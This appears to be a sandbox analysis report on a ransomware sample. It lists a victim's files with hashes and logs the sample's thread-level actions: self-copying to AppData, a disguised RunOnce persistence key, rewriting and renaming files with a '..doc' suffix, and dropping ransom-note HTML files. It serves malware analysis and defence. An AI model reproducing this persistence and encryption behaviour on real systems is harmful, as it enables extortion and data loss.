c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\wryiecxnl.ods	41.70 KB (42698 bytes)	MD5: 45eaac4bc88b05e200b38b08360ac8fa SHA1: 21907f66018c1e00fbdeae8dbbbe08e8312e1128 SHA256: 7e32f2864e64a33eb337e4bca656e4b81d6115d7e3984cf1cf70a78cb007c786	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\xctuw.xlsx	52.00 KB (53248 bytes)	MD5: a099b07894d23f259de01bcd81532ab3 SHA1: 35aeab669ec14f35f86cc273f380a4b618822039 SHA256: a638b3b671899fc0c2a422c3f662045bdaaf1269138b1b16ffe4dad39a6eba8a	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\xie6iniolr04edgffg.odp	81.62 KB (83584 bytes)	MD5: ce5622667042406ce58a90565531f08b SHA1: 72322e6a97eca15e148203c98b50e7d095a37f12 SHA256: 60d63174500f7fab9f0922dc5f2a82091e05ee312f4d75e5aabffa5ad2640f80	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\y1x8zqxci645d\kfmszdl4nvsi2cz.docx	68.45 KB (70096 bytes)	MD5: 5139f918139be5599211e4c712f07bdd SHA1: 2cce857577dcaa1d2fdae120468c3eb588ebd3c8 SHA256: 5b4d1b02dae55d427fd7ecd2cb5df99d767fe36058c6b567e33994088a3ef535	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\y1x8zqxci645d\wgy2yqxdku.pdf	33.89 KB (34704 bytes)	MD5: 326f7cbebd98a3b18f99a43a7db7b05a SHA1: 4c3768d54fb47063f1c1755c70088160d0e244d9 SHA256: 7f71b00cb45357d55d27f6d2b94aebfdfce3f35dee287a8adcddb17c5ffa02b8	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\y1x8zqxci645d\wi8f0q5o.xls	8.44 KB (8640 bytes)	MD5: d5997333bcd42432169bfcaee29512f0 SHA1: 9f4a43f439980be525e48c9fbff55fc7edabc093 SHA256: bb2fe0b0822c2002b2ce57819b375c0f52cd68d7979d002272f227af7ae8b6dd	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\y1x8zqxci645d\x5iffemyr.odp	27.87 KB (28543 bytes)	MD5: 9de86a69a5cc92864320d842ac329aaf SHA1: 5b29d9da543911b9f24bd5d241b1d8c9a9bd80fa SHA256: ef0c4f7b3790b7af48fb54d9c088e8ad78ffff7a37de5d6deb49ec19b589016a	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\y1x8zqxci645d\xy sr4g.pptx	84.81 KB (86848 bytes)	MD5: 128767fe14a9907085fd57f6c937cfc0 SHA1: 1df958b17a5b9763fb698187cafec716ab9b1d79 SHA256: 134129fe83705338601df589940d84ae9218a1a75fc2d0c578408ae9748acf64	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\y1x8zqxci645d\yb mn0zdv.pptx	93.93 KB (96185 bytes)	MD5: b2749671c660f1646c5037ec51a8bf90 SHA1: 92ca8270f596b9429482882370e3c4253fe257eb SHA256: 7e14be90109155ea24e755540485f426e893954710baf6285b5eef9e63d992aa	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\5walp3bl2rwl-yo.xls	83.88 KB (85888 bytes)	MD5: d53936a9eec3f561e3ebfa9c778c4334 SHA1: c1fb7eafa9413c5aa69d844b7892796f8dd0b842 SHA256: 3bf122ad6abeb26c19b9333ce3411ba51ef96d24d141e8128a338de4056f0377	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\oidz6lcgnvxgf5.csv	41.22 KB (42211 bytes)	MD5: 955e310b305a7e8202364c651d7e75b8 SHA1: 40ba7d618b16398d69675848db8f3c9e374096d8 SHA256: e2a8916d0118c0fd8d54cedd715ab3af840515aad7a60473574cde18de86d475	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\opt7hcn-3pa.xls	23.72 KB (24288 bytes)	MD5: 3e51be8ba7c141dd85be275ce5cccbc3 SHA1: 1a6c72464834014a881501cd2dbc1f20e346a240 SHA256: 13ffcb9e9f4301353a8f50af6bf4af1778c1a07562de78044a4cc394802c10e5	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\psmh09ma0h6sf.ots	43.06 KB (44093 bytes)	MD5: aeb0d0c152fd93185711103144ab979e SHA1: 4d59939d7abe3f0b9accde8a972a1dd8f7f9aa0e SHA256: 8a2ecaea0995acdefa73abf55121aa89cd6fde12362cda4928e57169714ec8fe	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\st0nfhr7kld7u.doc	2.52 KB (2576 bytes)	MD5: 41d2932154f84eaf3cab87bf7a31cfcb SHA1: f232156e9c35549d716910003fb608ba57e44ed2 SHA256: ccb1380350d1cf11b606f4fad048837386749aec598121b9710c4c3b2840568f	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\ud56yevtc_mgvyoy1e.pptx	26.22 KB (26845 bytes)	MD5: f32acbff1d55d75ff859ac340b6514be SHA1: 62a2d45b559f9b7a60926a8a99f5633e12c48081 SHA256: a5cac3c6ff0c64690a3b2239090494e30083a5b42f838f22f8390f38e6727e2b	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\vatb.csv	15.58 KB (15953 bytes)	MD5: 55c6a2205364cf393b393ce3fe80297c SHA1: 6d0056a644b354efae9424f01dab3fa33355f9ab SHA256: 1e53ab22d9ffb9afb5d3fc4935107c830caf2129bd7141be820c982e2e09ad8d	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\yfdwehymeqvc.rtf	44.99 KB (46066 bytes)	MD5: e4ca725480de99538747656fb243f6a0 SHA1: 40d49f0e6ae4a03c3e8f31d5505cf786932996a8 SHA256: 68e7cd45719d00a84ec4845337ab3f9fcfcec5386664c0d2426d907061bb53ca	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\wcamw\3qzjcog3a.ods	18.19 KB (18624 bytes)	MD5: ed3f754e5eca0ffa477f9b6e2ed592f9 SHA1: 54c390f584ef73b4f678bee834c8ccea0bb1dbea SHA256: 799f2ab2e477efd4b00f4a8c932f2f3d7ef50c86ed5a5f7a5750f3c5ad9d1b2c	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\ttwps\pkpwidd38h0\4ldoz2w50h\wcamw\hfvups2ina_-bdqv8.rtf	85.77 KB (87824 bytes)	MD5: c0ccae55766c814555f970daad435d74 SHA1: 2510608c7e28d38e78465b8c4a48d886b2ae3482 SHA256: e2ba19b9bb407881b43899599adb1368bae5d8f7f748fc95c14196731a0bde1d	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\outlook files\lcfkj@kiekc.df.pst	265.92 KB (272304 bytes)	MD5: 1e22fc77e5bc9612f67bf185dfc04a15 SHA1: 5790d282e5fd089b445970b5715e31f15667ad03 SHA256: 05179a8e28d115d9421190660a0216a83e68ea9f1c07cade8af59e39d4194a65	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\onenote notebooks\my notebook\open notebook.onetoc2	6.97 KB (7136 bytes)	MD5: 9aa8a9f23804a3ec80fa871475dbfbdb SHA1: 7f9ead291dd9cb8ee524c82c4e30c3ae15d829b7 SHA256: 77b4c0d5077e25a7a3704e7f90b30af7bc246962689b4730457875e3ddcd0973	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\onenote notebooks\my notebook\quick notes.one	352.62 KB (361080 bytes)	MD5: a41e1e20c8bde5fea292e8b65d41986f SHA1: d7617d18bc4c5dfc5e3aa2e8d8261bbe0d756134 SHA256: 5c7795ed04090e95cd8e455955db8738e4a2124bbc17544de863e0899051698d	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\my shapes\desktop.ini	1.14 KB (1168 bytes)	MD5: b7ba30f52e6052a678f9b39e7f965d17 SHA1: f8efb0bfbdbc55f85ac8c41a76888c1ffcb833c7 SHA256: 4fb0d86f57dc9ce54ad774b2f8d42292f226f3af462a56b2a8ad6bb0dd670c53	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\my shapes\favorites.vssx	0.88 KB (896 bytes)	MD5: cda824c35f96337a7cb8425128ed2d4b SHA1: badf397a72453babf239c0267ad39e720bf46cee SHA256: 8d3a4ffc3876de9ca4403f6ea9d263f5a93ff83e83cb5c065909528f05756d2e	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\my shapes\_private\folder.ico	30.15 KB (30870 bytes)	MD5: 41c4d389a921cbb64521e10a5078c10c SHA1: 5cfba21a4bc52a1fc56b8ce92cd554861da3aaa1 SHA256: 1a8c01876d88f34dbbe6d6594057c12893ef188f4cc1066f17876d3096639495	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\2xncn\grki.docx	52.30 KB (53552 bytes)	MD5: 1b0174959cdf1c95e7302f7f642aab37 SHA1: 8326e7835c750b9f5db47e5d2a22f2b050e8a85b SHA256: 62aae11d86e50f8dbcaf9093247519aa18272dafdadefc36b8d3d505bf7e27d8	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\2xncn\kt33n_.ppt	10.72 KB (10980 bytes)	MD5: 85052940c01ef0d3c9c27f50d59a6baa SHA1: 443ce008650116e5f5b2e46405f9012112a7d464 SHA256: 0d9ccdc0d2312b2fdd4acd1ab28f1d539aa6a799eb470984fb4c494d62fae004	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\2xncn\ucq2jjz35.xlsx	84.36 KB (86384 bytes)	MD5: e0ad9b054b207ded2770a5b538452a0f SHA1: bb17fdf10902f89c0e50402243b81c5725f9f202 SHA256: 67199ddf4dbd100f8a710b2ca6a95eb7fbca95e9bdbc37a8431bf3e34d71b3d3	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\2xncn\vvbl5czqczhto.pptx	50.64 KB (51856 bytes)	MD5: 4eaad822e259b13761f077f604889d85 SHA1: 1c0d13aac0f75b3bb076003af17e3d0d056bf25c SHA256: d2a6a09d8be9a40d4256ef12a37ffe01f5979ab403d6464058a38a4388e371be	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\1ilkjyrgg.ots	46.58 KB (47702 bytes)	MD5: 1696b50b454109c22f7c62c0714fbb92 SHA1: 7152dfea0d70b3bc0aae98d0117878b3bfb4e189 SHA256: a762cb70e2691cca2658d174de64f6c2188bc17fe2a3fe7e1e989606aa5b17d5	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\23i5acjuyspml.m4a	78.79 KB (80678 bytes)	MD5: 1049d6cfe5fcc37f7e557a255cec377d SHA1: 3625354724d3a06c839371ed15d5f8af54be7078 SHA256: 790f1d58144a7dc5b4d191b921fcee9bc029dfaf79a368f6fcd7e3950982414d	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\34vihcjptwsy126cu6r.jpg	82.52 KB (84496 bytes)	MD5: 1a8c1766f2707c2f0973a80b3531f419 SHA1: 39d8ad9b912c520658a91b194d6ce7ccaf7b937c SHA256: 05b299956ca9ed1ccad20469151cde9c1e811cdaef4d01ac71f8e0fc830e885a	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\5aymmplf.mp3	73.84 KB (75615 bytes)	MD5: 0aadc6941fef5e387cee1db92622d22e SHA1: 8422a1e0d87c962ea7138611920d7218bb68e29a SHA256: 9e6a6d4489b2489ff45ac6c29993382955159ed43c4ebf69f5fc00632376c183	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\7uelr6 ahnxhpqmpu.flv	9.52 KB (9750 bytes)	MD5: 28ba4169da6d69a97930ba2edd8c6ef2 SHA1: 010b5042c14e40944d38329a95fe24793bbe3989 SHA256: 29fc657349085667f690d1aa6b761fe060ff1765abc96f66f9e6e65bab12b1e1	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\9j9hsv0agjq5p.mp4	94.14 KB (96403 bytes)	MD5: 0a88f39f142d19070c62bb3853c9fb88 SHA1: 18dec2ee645b8558ff53f9a56a80d60b06d62fb2 SHA256: dd478094357324673e879840eb21a008ee218b69107c7c097d4621f4a96e5506	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\af0cjnijiae7zpu.swf	3.83 KB (3920 bytes)	MD5: 263e21ad09c330f8518cc491c7000f95 SHA1: bbcf9e81f3a1ab303224edd160f1fe05682cbeb5 SHA256: d7426fd57e5734570dd1a6b424bdb25827ac84f0fe8376784a6ff877a90a13d6	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\bwjej4q.gif	7.00 KB (7168 bytes)	MD5: 7413754f9c6e16e9dfc044f6de3b6823 SHA1: 5edba77834febc437f81c74a3d27ad01633153be SHA256: ffc5b02b3b793cb97fa3ed455c0faf5829231dc62b3a284055ad53544ee19868	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\cfrs5lie-afnl_qf.jpg	14.34 KB (14686 bytes)	MD5: bb7a682d9063e54fbc7c03db7a99ff4f SHA1: 0b8d12fcd3c43aed1253a41eb901d2ae794be112 SHA256: c4805b3ab365557436f3cafafe18685652e5849cd7f4f18a145f84b42d894087	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\cp_i6vwpeagucdb9vyn0.pdf	62.21 KB (63704 bytes)	MD5: 5cfbabe8dde1f2fd154410b802dd7b34 SHA1: ced769de411494a779b2b2343cd9f4b79680e3a9 SHA256: 93999ffd16aafbc136d3e430b5bec7fc0a67f521b0bd5ae4ef00e6317d28f56e	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\cr1v23mrj a0x.m4a	2.20 KB (2256 bytes)	MD5: 353e22f480804d868ba20aa5ac199d8b SHA1: 06e8d8c2ffba635b70c747c95c456e3cadf25f62 SHA256: 667d72304a80383477cc66d3cd1415043e689a10be09a88a652e2ab78b14f6c2	File Actions Show Properties Download

Threads

Thread 0xfe4

(Host: 16, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Filename	process_name = c:\users\ciihmn~1\appdata\local\temp\vworbzlbc.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 2048	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\CIIHMN~1\AppData\Local\Temp	1	Fn
Environment	Get Environment String	name = appdata, result_out = C:\Users\CIiHmnxMn6Ps\AppData\Roaming	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, type = file_attributes	1	Fn
File	Copy	source_filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = BrowserUpdateCheck, data = 0	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	1	Fn
Registry	Write Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = BrowserUpdateCheck, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 102, type = REG_SZ	1	Fn
Environment	Get Environment String	name = public, result_out = C:\Users\Public	1	Fn
File	Create	filename = C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7, size = 258	1	Fn Data
File	Write	filename = C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7, size = 768	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Process	Create	process_name = taskkill /F /T /PID 2784, os_pid = 0xff4, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0xffc

(Host: 11576, Network: 0)

Category	Operation	Information	Count	Logfile
File	Create	filename = C:\bootmgr, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\BOOTNXT, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\BOOTNXT, type = size, size_out = 1	1	Fn
File	Read	filename = C:\BOOTNXT, size = 8192, size_out = 1	1	Fn Data
File	Write	filename = C:\BOOTNXT, size = 16	1	Fn Data
File	Write	filename = C:\BOOTNXT, size = 32	1	Fn Data
File	Write	filename = C:\BOOTNXT, size = 16	1	Fn Data
File	Write	filename = C:\BOOTNXT, size = 128	1	Fn Data
File	Write	filename = C:\BOOTNXT, size = 768	1	Fn Data
File	Move	source_filename = C:\BOOTNXT, destination_filename = C:\BOOTNXT..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\BOOTSECT.BAK, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\BOOTSECT.BAK, type = size, size_out = 8192	1	Fn
File	Read	filename = C:\BOOTSECT.BAK, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\BOOTSECT.BAK, size = 8192	1	Fn Data
File	Write	filename = C:\BOOTSECT.BAK, size = 32	1	Fn Data
File	Write	filename = C:\BOOTSECT.BAK, size = 16	1	Fn Data
File	Write	filename = C:\BOOTSECT.BAK, size = 128	1	Fn Data
File	Write	filename = C:\BOOTSECT.BAK, size = 768	1	Fn Data
File	Move	source_filename = C:\BOOTSECT.BAK, destination_filename = C:\BOOTSECT.BAK..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\hiberfil.sys, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\pagefile.sys, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\swapfile.sys, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\desktop.ini, type = size, size_out = 174	1	Fn
File	Read	filename = C:\Users\desktop.ini, size = 8192, size_out = 174	1	Fn Data
File	Write	filename = C:\Users\desktop.ini, size = 176	1	Fn Data
File	Write	filename = C:\Users\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\desktop.ini, destination_filename = C:\Users\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Public\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\desktop.ini, type = size, size_out = 174	1	Fn
File	Read	filename = C:\Users\Public\desktop.ini, size = 8192, size_out = 174	1	Fn Data
File	Write	filename = C:\Users\Public\desktop.ini, size = 176	1	Fn Data
File	Write	filename = C:\Users\Public\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\desktop.ini, destination_filename = C:\Users\Public\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Public\Videos\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Videos\desktop.ini, type = size, size_out = 380	1	Fn
File	Read	filename = C:\Users\Public\Videos\desktop.ini, size = 8192, size_out = 380	1	Fn Data
File	Write	filename = C:\Users\Public\Videos\desktop.ini, size = 384	1	Fn Data
File	Write	filename = C:\Users\Public\Videos\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Videos\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Videos\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Videos\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Videos\desktop.ini, destination_filename = C:\Users\Public\Videos\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Videos\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Videos\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\Videos\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Public\Pictures\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Pictures\desktop.ini, type = size, size_out = 380	1	Fn
File	Read	filename = C:\Users\Public\Pictures\desktop.ini, size = 8192, size_out = 380	1	Fn Data
File	Write	filename = C:\Users\Public\Pictures\desktop.ini, size = 384	1	Fn Data
File	Write	filename = C:\Users\Public\Pictures\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Pictures\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Pictures\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Pictures\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Pictures\desktop.ini, destination_filename = C:\Users\Public\Pictures\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Pictures\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Pictures\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\Pictures\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Public\Music\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Music\desktop.ini, type = size, size_out = 380	1	Fn
File	Read	filename = C:\Users\Public\Music\desktop.ini, size = 8192, size_out = 380	1	Fn Data
File	Write	filename = C:\Users\Public\Music\desktop.ini, size = 384	1	Fn Data
File	Write	filename = C:\Users\Public\Music\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Music\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Music\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Music\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Music\desktop.ini, destination_filename = C:\Users\Public\Music\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Music\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Music\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\Music\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Public\Libraries\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Libraries\desktop.ini, type = size, size_out = 175	1	Fn
File	Read	filename = C:\Users\Public\Libraries\desktop.ini, size = 8192, size_out = 175	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\desktop.ini, size = 176	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Libraries\desktop.ini, destination_filename = C:\Users\Public\Libraries\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Libraries\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Libraries\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\Libraries\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Public\Libraries\RecordedTV.library-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Libraries\RecordedTV.library-ms, type = size, size_out = 999	1	Fn
File	Read	filename = C:\Users\Public\Libraries\RecordedTV.library-ms, size = 8192, size_out = 999	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\RecordedTV.library-ms, size = 1008	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\RecordedTV.library-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\RecordedTV.library-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\RecordedTV.library-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Libraries\RecordedTV.library-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Libraries\RecordedTV.library-ms, destination_filename = C:\Users\Public\Libraries\RecordedTV.library-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Libraries\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Downloads\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Downloads\desktop.ini, type = size, size_out = 174	1	Fn
File	Read	filename = C:\Users\Public\Downloads\desktop.ini, size = 8192, size_out = 174	1	Fn Data
File	Write	filename = C:\Users\Public\Downloads\desktop.ini, size = 176	1	Fn Data
File	Write	filename = C:\Users\Public\Downloads\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Downloads\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Downloads\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Downloads\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Downloads\desktop.ini, destination_filename = C:\Users\Public\Downloads\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Downloads\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Downloads\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\Downloads\Read___ME.html, size = 4282	1	Fn Data
